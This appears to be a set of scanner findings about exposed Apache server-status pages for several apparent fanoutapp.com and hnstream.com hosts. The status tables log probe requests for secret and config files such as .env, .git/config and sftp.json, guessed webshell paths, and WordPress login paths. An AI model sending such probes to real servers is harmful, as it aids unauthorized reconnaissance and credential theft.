1-315703220/23/1056_ 0.9511378420.00.063.14 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 1-315703220/25/1001_ 0.9510479770.00.062.66 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /@vite/env HTTP/1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf71d7f6f5
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Saturday, 20-Dec-2025 21:49:51 UTC Restart Time: Friday, 21-Nov-2025 21:54:35 UTC Parent Server Config. Generation: 30 Parent Server MPM Generation: 29 Server uptime: 28 days 23 hours 55 minutes 16 seconds Server load: 0.19 0.19 0.18 Total accesses: 64696 - Total Traffic: 186.6 MB - Total Duration: 561315 CPU Usage: u51.97 s78.24 cu819.74 cs236.88 - .0474% CPU load .0258 requests/sec - 78 B/second - 3024 B/request - 8.67619 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0391552no1yes124000 1391551no1yes025000 Sum202 149000 _________________W________________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-293915520/58/887_ 1.21113112080.00.112.72 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 0-293915520/57/851_ 1.2110367260.00.122.84 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /@vite/env HTTP/1.1 0-293915520/58/867_ 1.2022589110.00.132.27 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql HTTP/1.1 0-293915520/53/837_ 1.2021374170.00.102.37 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api HTTP/1.1 0-293915520/51/873_ 1.2021380280.00.092.96 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/graphql HTTP/1.1 0-293915520/56/855_ 1.218362370.00.132.67 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-293915520/58/881_ 1.217361670.00.122.67 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 0-293915520/55/879_ 1.2018370200.00.112.85 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 0-293915520/57/864_ 1.2021372420.00.193.11 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/gql HTTP/1.1 0-293915520/54/879_ 1.2016360760.00.262.95 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger.json HTTP/1.1 0-293915520/55/879_ 1.2017379530.00.103.25 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /webjars/swagger-ui/index.html HTTP/1.1 0-293915520/57/891_ 1.2021381020.00.113.14 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql/api HTTP/1.1 0-293915520/58/862_ 1.2019361420.00.112.65 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 0-293915520/56/864_ 1.210363960.00.122.53 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-293915520/58/864_ 1.2113376140.00.122.66 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 0-293915520/61/853_ 1.2112357440.00.282.88 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 0-293915520/53/883_ 1.2020373620.00.182.99 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger-ui.html HTTP/1.1 0-2939155226/57/879W 1.200069950.00.122.55 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-293915520/57/873_ 1.212382560.00.122.69 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-293915520/61/862_ 1.216383390.00.132.27 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-293915520/56/864_ 1.216377010.00.122.56 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 0-293915520/54/863_ 1.213379390.00.112.50 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 0-293915520/55/870_ 1.211381110.00.112.66 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-293915520/57/838_ 1.2015364510.00.112.51 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 0-293915520/61/887_ 1.2114379240.00.192.86 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 1-293915510/20/975_ 0.5545708125010.00.112.81 134.199.160.151http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-293915510/20/973_ 0.604570983030.00.032.72 103.203.57.20http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-293915510/19/962_ 0.56395121103630.00.032.52 157.245.216.153http/1.1 1-293915510/20/998_ 0.6131762497040.00.042.92 140.248.75.144http/1.1api.livecounter.org:8000POST /counters/1/ HTTP/1.1 1-293915510/20/961_ 0.6140101498100.00.042.63 45.142.154.92http/1.1api.hnstream.com:8000GET /api/v2/heartbeat HTTP/1.1 1-293915510/21/990_ 0.584010095060.00.043.14 45.142.154.92http/1.1 1-293915510/20/999_ 0.614010165120.00.102.95 45.142.154.92http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-293915510/23/977_ 0.584010770230.00.042.70 45.142.154.92http/1.1 1-293915510/20/980_ 0.614009181780.00.042.74 45.142.154.92http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-293915510/21/966_ 0.584009267440.00.102.63 167.82.230.24http/1.1api.hnstream.com:8000GET /news/items/ HTTP/1.1 1-293915510/18/985_ 0.5739503683200.00.103.06 157.245.216.153http/1.1 1-293915510/18/969_ 0.613951470790.00.032.52 157.245.216.153http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 1-293915510/19/965_ 0.613950469890.00.192.85 157.245.216.153http/1.1api.hnstream.com:8000GET /.git/config HTTP/1.1 1-293915510/19/961_ 0.6131765775190.00.043.19 140.248.75.87http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-293915510/19/979_ 0.571507183360.00.032.79 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-293915510/22/961_ 0.593171178720.00.042.98 127.0.0.1http/1.1api.hnstream.com:8000POST / HTTP/1.1 1-293915510/19/987_ 0.6115123478020.00.042.88 167.82.237.138http/1.1api.livecounter.org:8000GET / HTTP/1.1 1-293915510/19/966_ 0.581376288180.00.042.70 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-293915510/22/959_ 0.593171166530.00.052.75 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-293915510/21/989_ 0.571535083320.00.042.72 62.60.131.80http/1.1 1-293915510/21/978_ 0.62645479870.00.032.57 157.52.92.89http/1.1api.livecounter.org:8000GET / HTTP/1.1 1-293915510/18/965_ 0.611381163280.00.102.77 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-293915510/21/964_ 0.58640080110.00.042.68 127.0.0.1http/1.1api.hnstream.com:8000GET /.well-known/security.txt HTTP/1.1 1-293915510/21/994_ 0.63342373060.00.262.94 140.248.75.52http/1.1api.hnstream.com:8000GET /robots.txt HTTP/1.1 1-293915510/18/938_ 0.5429073350.00.032.35 127.0.0.1http/1.1hnstream.com:8000HEAD /bc HTTP/1.1 2-22-0/0/715. 0.005969861</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf7c4ce0b7
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Thursday, 18-Dec-2025 17:49:36 UTC Restart Time: Friday, 21-Nov-2025 21:54:35 UTC Parent Server Config. Generation: 28 Parent Server MPM Generation: 27 Server uptime: 26 days 19 hours 55 minutes 1 second Server load: 0.17 0.22 0.20 Total accesses: 60840 - Total Traffic: 175.1 MB - Total Duration: 534385 CPU Usage: u48.35 s72.91 cu760.74 cs220.62 - .0476% CPU load .0262 requests/sec - 79 B/second - 3017 B/request - 8.78345 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0213666no1yes124000 1213665no1yes025010 Sum202 149010 _W________________________________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-272136660/63/778_ 1.4813102030.00.212.44 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-2721366626/57/750W 1.460062020.00.132.63 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-272136660/66/764_ 1.482380140.00.212.01 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-272136660/61/725_ 1.480369930.00.142.07 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-272136660/60/772_ 1.4621370450.00.202.68 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/graphql HTTP/1.1 0-272136660/63/737_ 1.4622556750.00.202.39 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql HTTP/1.1 0-272136660/66/764_ 1.4621455720.00.132.36 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api HTTP/1.1 0-272136660/70/771_ 1.4720364760.00.242.48 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger-ui.html HTTP/1.1 0-272136660/59/750_ 1.4721359950.00.202.79 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql/api HTTP/1.1 0-272136660/62/768_ 1.4721351720.00.142.40 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/gql HTTP/1.1 0-272136660/66/770_ 1.4719372550.00.243.01 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 0-272136660/64/788_ 1.4718477140.00.152.87 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 0-272136660/65/748_ 1.4717356900.00.142.38 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /webjars/swagger-ui/index.html HTTP/1.1 0-272136660/63/764_ 1.4716359770.00.142.32 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger.json HTTP/1.1 0-272136660/67/749_ 1.4715369710.00.152.27 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 0-272136660/66/752_ 1.4713353130.00.142.30 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 0-272136660/66/776_ 1.4714367540.00.142.54 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 0-272136660/63/775_ 1.4812364730.00.202.20 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 0-272136660/68/762_ 1.4811365990.00.142.48 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 0-272136660/62/758_ 1.4810378490.00.221.98 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /@vite/env HTTP/1.1 0-272136660/65/752_ 1.489365460.00.212.27 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-272136660/61/755_ 1.487373990.00.132.21 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 0-272136660/69/764_ 1.486371640.00.152.44 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 0-272136660/55/728_ 1.486358920.00.192.29 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-272136660/67/775_ 1.483373990.00.212.57 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-272136650/32/930_ 0.8740112530.00.202.60 127.0.0.1http/1.1hnstream.com:8000GET /a2.php HTTP/1.1 1-272136650/35/925_ 0.873080100.00.082.48 127.0.0.1http/1.1hnstream.com:8000GET /usep.php HTTP/1.1 1-272136650/32/918_ 0.8730101650.00.072.44 127.0.0.1http/1.1hnstream.com:8000GET /file.php HTTP/1.1 1-272136650/37/948_ 0.873085640.00.152.77 127.0.0.1http/1.1hnstream.com:8000GET /asd67.php HTTP/1.1 1-272136650/31/917_ 0.872095430.00.082.55 127.0.0.1http/1.1hnstream.com:8000GET /manager.php HTTP/1.1 1-272136650/37/944_ 0.872090470.00.163.03 127.0.0.1http/1.1hnstream.com:8000GET /rss.php HTTP/1.1 1-272136650/30/951_ 0.872063000.00.132.75 127.0.0.1http/1.1hnstream.com:8000GET /wpls.php HTTP/1.1 1-272136650/37/926_ 0.872068280.00.082.61 127.0.0.1http/1.1hnstream.com:8000GET /file7.php HTTP/1.1 1-272136650/34/934_ 0.871080130.00.072.57 127.0.0.1http/1.1hnstream.com:8000GET /zeal.php HTTP/1.1 1-272136650/36/924_ 0.871066100.00.152.48 127.0.0.1http/1.1hnstream.com:8000GET /c.php HTTP/1.1 1-272136650/35/940_ 0.881079890.00.072.83 127.0.0.1http/1.1hnstream.com:8000GET /133.php HTTP/1.1 1-272136650/36/926_ 0.881069040.00.072.44 127.0.0.1http/1.1hnstream.com:8000GET /makeasmtp.php HTTP/1.1 1-272136650/36/920_ 0.881066560.00.082.53 127.0.0.1http/1.1hnstream.com:8000GET /wrt.php HTTP/1.1 1-272136650/29/919_ 0.880065710.00.063.11 127.0.0.1http/1.1hnstream.com:8000GET /htaccess.php HTTP/1.1 1-272136650/36/932_ 0.880081390.00.072.62 127.0.0.1http/1.1hnstream.com:8000GET /alfa.php HTTP/1.1 1-272136650/36/916_ 0.890076570.00.082.82 127.0.0.1http/1.1hnstream.com:8000GET /wp-content/themes/ HTTP/1.1 1-272136650/36/939_ 0.890075170.00.082.69 127.0.0.1http/1.1hnstream.com:8000GET /wp-content/uploads/index.php HTTP/1.1 1-272136650/34/923_ 0.876085680.00.072.54 127.0.0.1http/1.1hnstream.com:8000GET /xx.php HTTP/1.1 1-272136650/31/908_ 0.876063710.00.072.66 127.0.0.1http/1.1hnstream.com:8000GET /wp-includes/Text/Diff/Renderer/ HTTP/1.1 1-272136650/36/945_ 0.876080130.00.082.64 127.0.0.1http/1.1hnstream.com:8000GET /security.php HTTP/1.1 1-272136650/34/927_ 0.875077350.00.082.48 127.0.0.1http/1.1hnstream.com:8000GET /click.php HTTP/1.1 1-272136650/33/925_ 0.875060040.00.072.63 127.0.0.1http/1.1hnstream.com:8000GET /up.php HTTP/1.1 1-272136650/31/916_ 0.875076720.00.082.57 127.0.0.1http/1.1hnstream.com:8000GET /wp-content/403.php HTTP/1.1 1-272136650/33/951_ 0.874069420.00.132.65 127.0.0.1http/1.1hnstream.com:8000GET /mh.php HTTP/1.1 1-272136650/37/891_ 0.874070520.00.092.26 127.0.0.1http/1.1hnstream.com:8000GET /wp-content/packed.php HTTP/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf6edbaac9
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Tuesday, 16-Dec-2025 14:26:49 UTC Restart Time: Friday, 21-Nov-2025 21:54:35 UTC Parent Server Config. Generation: 26 Parent Server MPM Generation: 25 Server uptime: 24 days 16 hours 32 minutes 13 seconds Server load: 0.22 0.20 0.18 Total accesses: 55478 - Total Traffic: 159.0 MB - Total Duration: 498423 CPU Usage: u44.29 s66.38 cu702.7 cs204.35 - .0477% CPU load .026 requests/sec - 78 B/second - 3005 B/request - 8.98416 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 033305no1yes025000 133304no2yes124020 Sum203 149020 _____________________________________________W____.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-25333050/20/655_ 0.7213395280.00.062.07 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /wp-admin/css/wp-login.php HTTP/1.1 0-25333050/20/641_ 0.708056370.00.052.23 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-25333050/21/637_ 0.7121991074090.00.041.58 104.156.83.69http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-25333050/17/614_ 0.6482161920.00.051.74 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-25333050/22/652_ 0.642194759210.00.132.22 104.156.83.69http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-25333050/18/622_ 0.711595851220.00.042.01 104.156.83.69http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-25333050/19/638_ 0.661590149720.00.042.04 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-25333050/18/641_ 0.68981057240.00.071.96 127.0.0.1http/1.1hnstream.com:8000GET /favicon.ico HTTP/1.1 0-25333050/24/636_ 0.71986756030.00.082.41 140.248.75.75http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-25333050/17/650_ 0.71381746200.00.142.14 140.248.75.75http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-25333050/21/644_ 0.684293465830.00.132.58 127.0.0.1http/1.1api.hnstream.com:8000GET /.git/config HTTP/1.1 0-25333050/21/663_ 0.71434165770.00.072.55 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-25333050/21/627_ 0.693763650270.00.081.95 127.0.0.1http/1.1chat.fanoutapp.com:8000GET / HTTP/1.1 0-25333050/22/640_ 0.71413754110.00.041.94 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1 0-25333050/22/629_ 0.7134363800.00.062.00 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /wp-content/plugins/classic-editor/wp-login.php HTTP/1.1 0-25333050/20/632_ 0.7137347070.00.041.96 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /wp-admin/user/wp-login.php HTTP/1.1 0-25333050/19/650_ 0.7231461180.00.042.27 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /wp-content/plugins/wp-login.php HTTP/1.1 0-25333050/20/664_ 0.7132360120.00.111.88 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /wp-admin/images/wp-login.php HTTP/1.1 0-25333050/18/639_ 0.7228358060.00.042.22 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /wp-content/languages/wp-login.php HTTP/1.1 0-25333050/21/648_ 0.7226366660.00.051.64 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /wp-includes/certificates/wp-login.php HTTP/1.1 0-25333050/21/631_ 0.7223359530.00.121.87 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /wp-admin/maint/wp-login.php HTTP/1.1 0-25333050/21/636_ 0.7222453840.00.051.95 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /cgi-bin/wp-login.php HTTP/1.1 0-25333050/17/640_ 0.7219364820.00.102.17 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /wp-includes/pomo/wp-login.php HTTP/1.1 0-25333050/22/626_ 0.7216353330.00.111.91 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /wp-includes/fonts/wp-login.php HTTP/1.1 0-25333050/18/643_ 0.7220361140.00.042.21 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /wp-includes/IXR/wp-login.php HTTP/1.1 1-25333040/23/836_ 0.541397620.00.112.13 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-25333040/19/832_ 0.5320368650.00.032.29 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger-ui.html HTTP/1.1 1-25333040/21/827_ 0.5319396080.00.032.27 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 1-25333040/17/844_ 0.5317373200.00.022.31 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /webjars/swagger-ui/index.html HTTP/1.1 1-25333040/23/822_ 0.5316389890.00.042.25 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger.json HTTP/1.1 1-25333040/20/844_ 0.5315384920.00.102.50 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 1-25333040/17/856_ 0.5313357760.00.032.49 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 1-25333040/23/835_ 0.5313363130.00.032.41 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 1-25333040/20/842_ 0.5312375260.00.032.39 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 1-25333040/19/821_ 0.5311360190.00.042.20 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 1-25333040/22/844_ 0.539369680.00.042.58 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /@vite/env HTTP/1.1 1-25333040/22/833_ 0.545364600.00.042.17 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-25333040/21/826_ 0.5318363010.00.062.33 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 1-25333040/20/830_ 0.537361090.00.032.70 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-25333040/20/835_ 0.537374710.00.032.35 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.well-known/acme-challenge/wp-login.php HTTP/1.1 1-25333040/19/822_ 0.546364960.00.032.36 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-25333040/18/846_ 0.5221368300.00.102.42 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/gql HTTP/1.1 1-25333040/19/829_ 0.539381430.00.052.32 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-25333040/19/819_ 0.5221359660.00.032.33 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql/api HTTP/1.1 1-25333040/23/845_ 0.542366680.00.052.42 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-253330426/20/836W 0.520072650.00.032.25 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-25333040/17/827_ 0.543356080.00.032.45 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-25333040/16/820_ 0.542471530.00.032.29 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /wp-includes/customize/wp-login.php HTTP/1.1 1-25333040/22/861_ 0.54036499</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf74b6bf89
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Sunday, 14-Dec-2025 05:51:37 UTC Restart Time: Friday, 21-Nov-2025 21:54:35 UTC Parent Server Config. Generation: 24 Parent Server MPM Generation: 23 Server uptime: 22 days 7 hours 57 minutes 2 seconds Server load: 0.30 0.18 0.18 Total accesses: 51215 - Total Traffic: 145.0 MB - Total Duration: 463317 CPU Usage: u39.9 s59.79 cu645.38 cs188.2 - .0484% CPU load .0265 requests/sec - 78 B/second - 2968 B/request - 9.04651 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 04046457no1yes124010 14046328no0yes025000 Sum201 149010 ______________W___________________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-2340464570/15/580_ 0.3315390360.00.031.82 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/v1/swagger.json HTTP/1.1 0-2340464570/8/574_ 0.3314353070.00.081.98 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/api-docs HTTP/1.1 0-2340464570/15/563_ 0.3313363190.00.031.33 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v3/api-docs HTTP/1.1 0-2340464570/12/546_ 0.3312449180.00.031.52 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 0-2340464570/12/577_ 0.3311354830.00.021.98 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 0-2340464570/14/561_ 0.339346430.00.041.79 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-2340464570/11/556_ 0.3310344840.00.031.80 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /@vite/env HTTP/1.1 0-2340464570/14/567_ 0.336452850.00.031.63 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-2340464570/10/558_ 0.338350360.00.032.07 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 0-2340464570/10/575_ 0.337440450.00.021.87 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 0-2340464570/15/564_ 0.334359460.00.032.16 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 0-2340464570/13/587_ 0.332361160.00.032.15 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-2340464570/13/550_ 0.333545580.00.021.69 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-2340464570/12/563_ 0.331449490.00.031.70 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-23404645726/12/555W 0.320058520.00.021.82 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-2340464570/9/559_ 0.3222443560.00.021.66 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql HTTP/1.1 0-2340464570/12/570_ 0.3221354580.00.031.78 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/graphql HTTP/1.1 0-2340464570/14/586_ 0.3222354000.00.031.56 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api HTTP/1.1 0-2340464570/11/570_ 0.3221352670.00.031.98 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /graphql/api HTTP/1.1 0-2340464570/9/570_ 0.3221358580.00.031.48 127.0.0.1http/1.1todo-api.fanoutapp.com:8000POST /api/gql HTTP/1.1 0-2340464570/12/559_ 0.3220355420.00.031.61 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger-ui.html HTTP/1.1 0-2340464570/11/559_ 0.3219348260.00.031.71 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/index.html HTTP/1.1 0-2340464570/13/565_ 0.3318359460.00.031.79 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger/swagger-ui.html HTTP/1.1 0-2340464570/9/552_ 0.3317347580.00.021.60 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /webjars/swagger-ui/index.html HTTP/1.1 0-2340464570/10/568_ 0.3316555500.00.021.97 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /swagger.json HTTP/1.1 1-2340463280/11/739_ 0.294498390720.00.021.87 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-2340463280/10/733_ 0.3142593464140.00.032.11 140.248.88.40http/1.1api.livecounter.org:8000GET / HTTP/1.1 1-2340463280/11/726_ 0.311186489990.00.021.87 157.52.100.53http/1.1api.hnstream.com:8000GET /robots.txt HTTP/1.1 1-2340463280/10/748_ 